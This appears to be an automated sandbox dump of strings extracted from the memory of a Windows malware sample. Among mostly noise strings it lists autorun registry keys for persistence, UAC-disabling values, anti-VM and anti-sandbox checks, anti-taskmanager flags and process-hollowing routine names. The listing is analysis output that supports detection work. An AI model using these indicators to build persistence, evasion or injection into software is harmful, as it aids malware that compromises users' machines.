Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: hkey_current_user\software\microsoft\windows\currentversion\run	memstr_1f202d76-9
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: disableuac	memstr_882897c1-c
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: vbsloaderset't`	memstr_00cbb45f-6
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: d:\espacefree	memstr_df89d330-c
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: d:\espacefreeit	memstr_a7b4af61-1
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: scriptdirtt1	memstr_8c641f57-0
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: hkcu64\software\microsoft\windows\currentversion\runst	memstr_a9254601-0
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: hklm64\software\microsoft\windows\currentversion\policies\system	memstr_b846eb1c-d
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: anti_sandbox_vm	memstr_8b4a7425-c
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: vboxtray.exe	memstr_61fe1ce7-4
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: script	memstr_38de9fc1-a
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: anti_botkill*us	memstr_22580a70-c
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: startupkey1u~	memstr_d3c41a2f-b
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: startup1	memstr_0030079e-9
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: shortx	memstr_5a2ef1c9-c
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: exe_c?w	memstr_8d957dfa-2
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: @eewo	memstr_fba3a10c-2
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: /trxwb	memstr_bc1d0dc6-1
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 0skhcmrwx	memstr_ca687d2d-5
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: "tw^	memstr_df616826-e
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: le6xt	memstr_47f41377-4
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: auex	memstr_6b1ab3a2-f
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ware'	memstr_c815319e-5
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: sw_hide	memstr_eb1acfe9-e
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: auexsp	memstr_91e64536-5
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: execup	memstr_991ea283-7
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: reg_szdpn	memstr_dc766901-e
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: @$wp]	memstr_536cbe91-c
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: da3m.	memstr_7eb8d369-c
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 6y@qj	memstr_8a10d363-a
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: gxsqy	memstr_028c3de2-d
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: reg_szt	memstr_77b06294-d
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: reg_sz2r	memstr_3d96ecca-9
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: le6qt	memstr_65140e00-4
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 6~ero	memstr_f5b81a22-8
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ni_set	memstr_67451a9b-c
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: hkey_local_machine\software\microsoft\windows\currentversion\run9s	memstr_011407a7-4
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: c:\users\user\wrse\nngqrvwq.xl	memstr_2617ed09-c
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: .\device\harddiskvolume3us	memstr_d8e58357-1
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: .\device\harddiskvolume3	memstr_a1a5668e-c
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: .\device\harddiskvolume37	memstr_9263815f-b
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: .\device\harddiskvolume3	memstr_7922f5b3-b
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: .\device\harddiskvolume3\|	memstr_9288a04d-2
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: enableluatware\microso	memstr_f02350a7-5
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: reg_dword	memstr_2dde727e-e
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: vmwareuser.exe/	memstr_74b289a0-5
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: install_pathchine\soft&	memstr_7a072fee-4
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: install_folder9	memstr_2486c7aa-b
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ini_settings0	memstr_07ec74cd-0
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: startup2	memstr_0b9e660e-d
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: settingsfn	memstr_7b72133b-8
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: startupkey	memstr_d5b7d2f4-a
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: install_foldere /sc mi	memstr_a359fa7d-7
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: update.vbsn	memstr_93feacee-e
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: install_patha	memstr_36881846-b
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: settingsfnx	memstr_7d66eb9e-f
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: install_folders	memstr_91d2641c-2
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: dir3ctory_pathej	memstr_e44b06b7-5
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: vmwareservice.exem	memstr_a7490cac-5
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: install_folderd	memstr_5f7bbed3-a
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: update.vbs_	memstr_abeff0a7-3
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ini_settingsv	memstr_c8452f69-8
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: dir3ctory_pathe	memstr_4065536c-c
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: start.vbs	memstr_dbeb4a65-9
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ini_settings	memstr_e181be5f-f
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: windowsrepaire	memstr_3af8a476-6
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: enablelua	memstr_b30dc0a8-b
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: start.lnk	memstr_1f0244ed-e
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: startupkeyware\microso	memstr_7149cfa1-2
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: install_path	memstr_202f3d4b-0
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: const hidden = 0	memstr_4cbd44f1-0
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: install_folder	memstr_c1b7a60c-b
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: qsprs	memstr_706951ab-a
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: @(rt	memstr_17d95afa-4
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: tam*.b	memstr_0045b4eb-3
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: @x(rt	memstr_e3c9094a-c
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: hmhqt	memstr_91b6f8df-5
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: crlfl	memstr_084bb939-7
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: counter	memstr_d9895a5d-2
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: start	memstr_a4c5ec90-d
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: crlfhpt	memstr_25846bfc-e
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ray.exej	memstr_7a1a2c2e-5
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 3bhlt	memstr_080fbb02-e
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: eymxo$	memstr_e30697c8-7
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: @6b8mt	memstr_dace0ed2-e
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: h[8lt	memstr_cb640584-4
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: mkhlt	memstr_4a2950d1-8
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: msxlt	memstr_5c206dab-c
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: script[	memstr_ca6bf852-a
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: @x8mt	memstr_fc039222-8
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: gxmt	memstr_dc44330a-5
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: short	memstr_608465e7-e
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: scriptj	memstr_87c36bb2-a
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 6_hot	memstr_6045b811-b
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: reg_szx	memstr_f3804915-d
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: @ehrt	memstr_5d86d45f-a
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 8ehmt	memstr_a07fc1dd-8
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: enm l	memstr_522d35cd-2
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ho(st	memstr_bbd16feb-2
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: scriptl	memstr_429507d6-3
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: file ="	memstr_69d6a379-0
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ,hd8ot	memstr_e29c4028-e
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ,2j8ot	memstr_424ba123-b
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: m'hnt	memstr_6a4f68f0-c
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 3)xot	memstr_cfaba98e-0
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: m?xot	memstr_b12f2ca1-c
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: crlfhnt	memstr_a8c0c16a-c
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: '6xhot	memstr_aa82f0d3-8
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ,88ot	memstr_5733a420-8
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: '8hot	memstr_73896cbc-6
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: shortxpt	memstr_a94e495b-2
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: enm8e	memstr_70796865-0
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 6:8pt	memstr_e89ae687-a
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: auexhn	memstr_fc3946c3-1
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 3$8qt	memstr_d32a4f9d-a
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: exe_c	memstr_4b2d79ac-4
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: batwrite)	memstr_3a0757cd-e
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: vbsclose8	memstr_3f160631-8
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: hkcu64\software\microsoft\windows\currentversion\runoncew	memstr_01a2dc6d-5
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: vbswritef	memstr_ea4d0f31-8
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: batclose	memstr_04b59799-0
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: startup	memstr_51768f26-7
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: install_path;	memstr_4b5821e7-2
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: install_pathrtcut	memstr_04772d44-4
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: hkcu64\software\microsoft\wi	memstr_98db566c-6
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: startup2version\runonc	memstr_d720381c-8
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: install_pathv	memstr_15822562-e
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: antitaskp	memstr_9f303e67-4
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: pqgiogoraarleguqldnvhv.exe-	memstr_bc04aeee-5
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _runbinary_iswow64process:	memstr_93d69d38-1
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _runbinary_unmapviewofsection3	memstr_d2a6bd24-7
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _runbinary_allocateexespace	memstr_75a408f7-b
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: tbinary_iswow64processk	memstr_f36408f0-6
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: zpsers\user\temp\wgsr.msc@	memstr_1a739850-9
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: c:\windows\system32\msctf.dllv	memstr_d44156c7-b
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _runbinary_iswow64procession	memstr_7e1a3a86-5
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: orleql	memstr_0019bda9-f
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: p~kpp	memstr_fe80db5c-1
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: psers\user\temp\wgsr.msc	memstr_1c4f5615-6
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: pqgiogoraarleguqldnvhv.exe	memstr_aa1320be-1
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: c:\windows\system32\wldp.dlloc	memstr_68fed33b-b
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: c:\windows\system32\ntmarta.dll	memstr_ced7edc8-1
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: heapdecommittotalfreethreshold4	memstr_d2213020-b
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: imagesubsystemmajorversionoldy	memstr_40d49742-6
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: imagesubsystemminorversionexe	memstr_79bb2735-5
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: majoroperatingsystemversion	memstr_a2c7872b-5
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: readonlysharedmemoryheaponh	memstr_f2a0d36a-9
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: heapdecommittotalfreethresholda	memstr_3683d935-2
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: heapdecommitfreeblockthreshold~	memstr_b76b9c14-b
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: imagesubsystemmajorversionw	memstr_17c30e68-8
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: heapdecommitfreeblockthresholdl	memstr_dc5931cc-7
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: poptionalheaderimagebasenewe	memstr_e09abb44-1
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: readonlysharedmemoryheapsholdr	memstr_1cf7ca16-3
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: readimagefileexecoptionsshold	memstr_97646e5c-9
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: readonlysharedmemorybaseon	memstr_2aeec6ab-b
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: hrt\se	memstr_5dbaaffe-c
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: imagesubsystemminorversiony	memstr_a4229e41-d
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: readonlystaticserverdatanold	memstr_883880c2-a
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: r_<r_<@6p	memstr_7217a792-5
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ioptionalheadersizeofheadersnew	memstr_ec8ca2cb-2
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ioptionalheadersizeofimagenew	memstr_86718e50-c
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: readimagefileexecoptions	memstr_63cf842f-4
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: minoroperatingsystemversion	memstr_2c94f8e8-9
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: readonlystaticserverdata	memstr_b5703b2c-3
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: readonlysharedmemorybase	memstr_c9b658e9-b
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: start.cmd"	memstr_d4d1beea-4
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: settingsfn.	memstr_c88a9791-5
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: install_folder!	memstr_663e1706-1
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: byte[uctcreate8	memstr_2fe1499b-0
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: install_path3	memstr_c01e2a2f-7
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: @echo off	memstr_e0dd84b9-e
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: variables	memstr_dc3caedc-a
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: install_folderi	memstr_7257dd99-6
